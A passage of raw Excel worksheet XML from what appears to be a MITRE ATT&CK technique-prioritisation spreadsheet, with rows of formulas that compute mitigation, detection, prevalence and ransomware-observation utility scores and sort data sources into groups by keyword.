        <v>3</v>
      </c>
      <c r="T106" s="57" t="s">
        <v>376</v>
      </c>
      <c r="U106" s="57">
        <v>6</v>
      </c>
      <c r="V106" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.10952361904761905</v>
      </c>
      <c r="W106" s="37">
        <v>9</v>
      </c>
      <c r="X106" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y106" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z106" s="37">
        <v>5</v>
      </c>
      <c r="AA106" s="37">
        <v>0.05</v>
      </c>
      <c r="AB106" s="37">
        <v>0.05</v>
      </c>
      <c r="AC106" s="37"/>
      <c r="AD106" s="50" t="s">
        <v>380</v>
      </c>
      <c r="AE106" s="37" t="str" cm="1">
        <f t="array" ref="AE106">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD106)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF106" s="37">
        <v>102</v>
      </c>
      <c r="AG106" s="37" t="str" cm="1">
        <f t="array" ref="AG106">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD106)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH106" s="37">
        <v>102</v>
      </c>
      <c r="AI106" s="37" t="str" cm="1">
        <f t="array" ref="AI106">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD106)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ106" s="37">
        <v>102</v>
      </c>
      <c r="AK106" s="37" t="str" cm="1">
        <f t="array" ref="AK106">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD106)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL106" s="37">
        <v>102</v>
      </c>
      <c r="AM106" s="37" t="str" cm="1">
        <f t="array" ref="AM106">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD106)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN106" s="37">
        <v>0</v>
      </c>
      <c r="AO106" s="37">
        <v>1</v>
      </c>
      <c r="AP106" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ106" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>28.565053396825402</v>
      </c>
      <c r="AR106" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS106" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT106" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU10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0.70392984278155712</v>
      </c>
    </row>
    <row r="107" spans="1:47" ht="17">
      <c r="A107" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B107" s="37">
        <f t="shared" si="1"/>
        <v>76.699921333333336</v>
      </c>
      <c r="C107" s="37" t="s">
        <v>399</v>
      </c>
      <c r="D107" s="50" t="s">
        <v>369</v>
      </c>
      <c r="E107" s="37" t="s">
        <v>400</v>
      </c>
      <c r="F107" s="37">
        <v>1</v>
      </c>
      <c r="G107" s="37">
        <v>1</v>
      </c>
      <c r="H107" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I107" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J107" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K107" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L107" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M107" s="37">
        <v>0</v>
      </c>
      <c r="N107" s="56">
        <v>0</v>
      </c>
      <c r="O107" s="56">
        <v>0</v>
      </c>
      <c r="P107" s="56">
        <v>0</v>
      </c>
      <c r="Q107" s="56">
        <v>0</v>
      </c>
      <c r="R107" s="57" t="s">
        <v>375</v>
      </c>
      <c r="S107" s="57">
        <v>3</v>
      </c>
      <c r="T107" s="57" t="s">
        <v>376</v>
      </c>
      <c r="U107" s="57">
        <v>6</v>
      </c>
      <c r="V107" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>8.5714095238095242E-2</v>
      </c>
      <c r="W107" s="37">
        <v>9</v>
      </c>
      <c r="X107" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y107" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z107" s="37">
        <v>0</v>
      </c>
      <c r="AA107" s="37">
        <v>0</v>
      </c>
      <c r="AB107" s="37">
        <v>0</v>
      </c>
      <c r="AC107" s="37"/>
      <c r="AD107" s="50" t="s">
        <v>401</v>
      </c>
      <c r="AE107" s="37" t="str" cm="1">
        <f t="array" ref="AE107">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD107)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF107" s="37">
        <v>103</v>
      </c>
      <c r="AG107" s="37" t="str" cm="1">
        <f t="array" ref="AG107">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD107)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH107" s="37">
        <v>103</v>
      </c>
      <c r="AI107" s="37" t="str" cm="1">
        <f t="array" ref="AI107">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD107)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ107" s="37">
        <v>103</v>
      </c>
      <c r="AK107" s="37" t="str" cm="1">
        <f t="array" ref="AK107">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD107)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL107" s="37">
        <v>103</v>
      </c>
      <c r="AM107" s="37" t="str" cm="1">
        <f t="array" ref="AM107">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD107)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN107" s="37">
        <v>0</v>
      </c>
      <c r="AO107" s="37">
        <v>0</v>
      </c>
      <c r="AP107" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ107" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>25.566640444444445</v>
      </c>
      <c r="AR107" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS107" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT107" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU10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08" spans="1:47" ht="17">
      <c r="A108" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B108" s="37">
        <f t="shared" si="1"/>
        <v>77.442777714285711</v>
      </c>
      <c r="C108" s="37" t="s">
        <v>402</v>
      </c>
      <c r="D108" s="50" t="s">
        <v>369</v>
      </c>
      <c r="E108" s="37" t="s">
        <v>403</v>
      </c>
      <c r="F108" s="37">
        <v>1</v>
      </c>
      <c r="G108" s="37">
        <v>1</v>
      </c>
      <c r="H108" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I108" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J108" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K108" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L108" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M108" s="37">
        <v>0</v>
      </c>
      <c r="N108" s="56">
        <v>0</v>
      </c>
      <c r="O108" s="56">
        <v>0</v>
      </c>
      <c r="P108" s="56">
        <v>0</v>
      </c>
      <c r="Q108" s="56">
        <v>0</v>
      </c>
      <c r="R108" s="57" t="s">
        <v>375</v>
      </c>
      <c r="S108" s="57">
        <v>3</v>
      </c>
      <c r="T108" s="57" t="s">
        <v>376</v>
      </c>
      <c r="U108" s="57">
        <v>6</v>
      </c>
      <c r="V108" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>8.5714095238095242E-2</v>
      </c>
      <c r="W108" s="37">
        <v>9</v>
      </c>
      <c r="X108" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y108" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z108" s="37">
        <v>0</v>
      </c>
      <c r="AA108" s="37">
        <v>0</v>
      </c>
      <c r="AB108" s="37">
        <v>0</v>
      </c>
      <c r="AC108" s="37"/>
      <c r="AD108" s="50" t="s">
        <v>404</v>
      </c>
      <c r="AE108" s="37" t="str" cm="1">
        <f t="array" ref="AE108">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD108)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF108" s="37">
        <v>104</v>
      </c>
      <c r="AG108" s="37" t="str" cm="1">
        <f t="array" ref="AG108">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD108)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH108" s="37">
        <v>104</v>
      </c>
      <c r="AI108" s="37" t="str" cm="1">
        <f t="array" ref="AI108">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD108)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ108" s="37">
        <v>104</v>
      </c>
      <c r="AK108" s="37" t="str" cm="1">
        <f t="array" ref="AK108">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD108)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL108" s="37">
        <v>104</v>
      </c>
      <c r="AM108" s="37" t="str" cm="1">
        <f t="array" ref="AM108">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD108)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN108" s="37">
        <v>0</v>
      </c>
      <c r="AO108" s="37">
        <v>0</v>
      </c>
      <c r="AP108" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ108" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>25.814259238095236</v>
      </c>
      <c r="AR108" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS108" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT108" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU10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09" spans="1:47" ht="34">
      <c r="A109" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B109" s="37">
        <f t="shared" si="1"/>
        <v>42.1</v>
      </c>
      <c r="C109" s="37" t="s">
        <v>405</v>
      </c>
      <c r="D109" s="50" t="s">
        <v>369</v>
      </c>
      <c r="E109" s="37" t="s">
        <v>406</v>
      </c>
      <c r="F109" s="37">
        <v>1</v>
      </c>
      <c r="G109" s="37">
        <v>1</v>
      </c>
      <c r="H109" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I109" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J109" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K109" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L109" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M109" s="37">
        <v>0</v>
      </c>
      <c r="N109" s="56">
        <v>0</v>
      </c>
      <c r="O109" s="56">
        <v>0</v>
      </c>
      <c r="P109" s="56">
        <v>0</v>
      </c>
      <c r="Q109" s="56">
        <v>0</v>
      </c>
      <c r="R109" s="57"/>
      <c r="S109" s="57"/>
      <c r="T109" s="57"/>
      <c r="U109" s="57"/>
      <c r="V109" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W109" s="37">
        <v>0</v>
      </c>
      <c r="X109" s="37">
        <v>0</v>
      </c>
      <c r="Y109" s="37">
        <v>0</v>
      </c>
      <c r="Z109" s="37">
        <v>0</v>
      </c>
      <c r="AA109" s="37">
        <v>0</v>
      </c>
      <c r="AB109" s="37">
        <v>0</v>
      </c>
      <c r="AC109" s="37"/>
      <c r="AD109" s="50" t="s">
        <v>407</v>
      </c>
      <c r="AE109" s="37" t="str" cm="1">
        <f t="array" ref="AE109">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD109)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF109" s="37">
        <v>105</v>
      </c>
      <c r="AG109" s="37" t="str" cm="1">
        <f t="array" ref="AG109">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD109)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH109" s="37">
        <v>105</v>
      </c>
      <c r="AI109" s="37" t="str" cm="1">
        <f t="array" ref="AI109">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD109)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ109" s="37">
        <v>105</v>
      </c>
      <c r="AK109" s="37" t="str" cm="1">
        <f t="array" ref="AK109">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD109)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL109" s="37">
        <v>105</v>
      </c>
      <c r="AM109" s="37" t="str" cm="1">
        <f t="array" ref="AM109">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD109)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN109" s="37">
        <v>0</v>
      </c>
      <c r="AO109" s="37"/>
      <c r="AP109" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ109" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>14.033333333333333</v>
      </c>
      <c r="AR109" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS109" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT109" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU10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10" spans="1:47" ht="68">
      <c r="A110" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B110" s="37">
        <f t="shared" si="1"/>
        <v>264.39747857142856</v>
      </c>
      <c r="C110" s="37" t="s">
        <v>408</v>
      </c>
      <c r="D110" s="50" t="s">
        <v>409</v>
      </c>
      <c r="E110" s="37"/>
      <c r="F110" s="37">
        <v>4</v>
      </c>
      <c r="G110" s="37">
        <v>3</v>
      </c>
      <c r="H110" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.35</v>
      </c>
      <c r="I110" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J110" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K110" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L110" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M110" s="37">
        <v>0.257826</v>
      </c>
      <c r="N110" s="56">
        <v>0</v>
      </c>
      <c r="O110" s="56">
        <v>0</v>
      </c>
      <c r="P110" s="56">
        <v>2</v>
      </c>
      <c r="Q110" s="56">
        <v>1</v>
      </c>
      <c r="R110" s="57"/>
      <c r="S110" s="57">
        <v>0</v>
      </c>
      <c r="T110" s="57"/>
      <c r="U110" s="57">
        <v>0</v>
      </c>
      <c r="V110" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.4285714285714284E-2</v>
      </c>
      <c r="W110" s="37">
        <v>0</v>
      </c>
      <c r="X110" s="37">
        <v>0</v>
      </c>
      <c r="Y110" s="37">
        <v>0</v>
      </c>
      <c r="Z110" s="37">
        <v>3</v>
      </c>
      <c r="AA110" s="37">
        <v>0.03</v>
      </c>
      <c r="AB110" s="37">
        <v>0.03</v>
      </c>
      <c r="AC110" s="37"/>
      <c r="AD110" s="50" t="s">
        <v>410</v>
      </c>
      <c r="AE110" s="37" t="str" cm="1">
        <f t="array" ref="AE110">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD110)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF110" s="37">
        <v>106</v>
      </c>
      <c r="AG110" s="37" t="str" cm="1">
        <f t="array" ref="AG110">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD110)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH110" s="37">
        <v>106</v>
      </c>
      <c r="AI110" s="37" t="str" cm="1">
        <f t="array" ref="AI110">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD110)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ110" s="37">
        <v>106</v>
      </c>
      <c r="AK110" s="37" t="str" cm="1">
        <f t="array" ref="AK110">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD110)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL110" s="37">
        <v>106</v>
      </c>
      <c r="AM110" s="37" t="str" cm="1">
        <f t="array" ref="AM110">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD110)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN110" s="37">
        <v>0</v>
      </c>
      <c r="AO110" s="37">
        <v>2</v>
      </c>
      <c r="AP110" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ110" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>88.13249285714285</v>
      </c>
      <c r="AR110" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS110" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT110" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU11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4.2444044217687074</v>
      </c>
    </row>
    <row r="111" spans="1:47" ht="34">
      <c r="A111" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B111" s="37">
        <f t="shared" si="1"/>
        <v>46.985714285714288</v>
      </c>
      <c r="C111" s="37" t="s">
        <v>411</v>
      </c>
      <c r="D111" s="50" t="s">
        <v>409</v>
      </c>
      <c r="E111" s="37" t="s">
        <v>412</v>
      </c>
      <c r="F111" s="37">
        <v>1</v>
      </c>
      <c r="G111" s="37">
        <v>1</v>
      </c>
      <c r="H111" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I111" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J111" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K111" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L111" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M111" s="37">
        <v>0</v>
      </c>
      <c r="N111" s="56">
        <v>0</v>
      </c>
      <c r="O111" s="56">
        <v>2</v>
      </c>
      <c r="P111" s="56">
        <v>0</v>
      </c>
      <c r="Q111" s="56">
        <v>0</v>
      </c>
      <c r="R111" s="57"/>
      <c r="S111" s="57">
        <v>0</v>
      </c>
      <c r="T111" s="57"/>
      <c r="U111" s="57">
        <v>0</v>
      </c>
      <c r="V111" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W111" s="37">
        <v>0</v>
      </c>
      <c r="X111" s="37">
        <v>0</v>
      </c>
      <c r="Y111" s="37">
        <v>0</v>
      </c>
      <c r="Z111" s="37">
        <v>2</v>
      </c>
      <c r="AA111" s="37">
        <v>0.02</v>
      </c>
      <c r="AB111" s="37">
        <v>0.02</v>
      </c>
      <c r="AC111" s="37"/>
      <c r="AD111" s="50" t="s">
        <v>413</v>
      </c>
      <c r="AE111" s="37" t="str" cm="1">
        <f t="array" ref="AE111">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD111)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF111" s="37">
        <v>107</v>
      </c>
      <c r="AG111" s="37" t="str" cm="1">
        <f t="array" ref="AG111">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD111)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH111" s="37">
        <v>107</v>
      </c>
      <c r="AI111" s="37" t="str" cm="1">
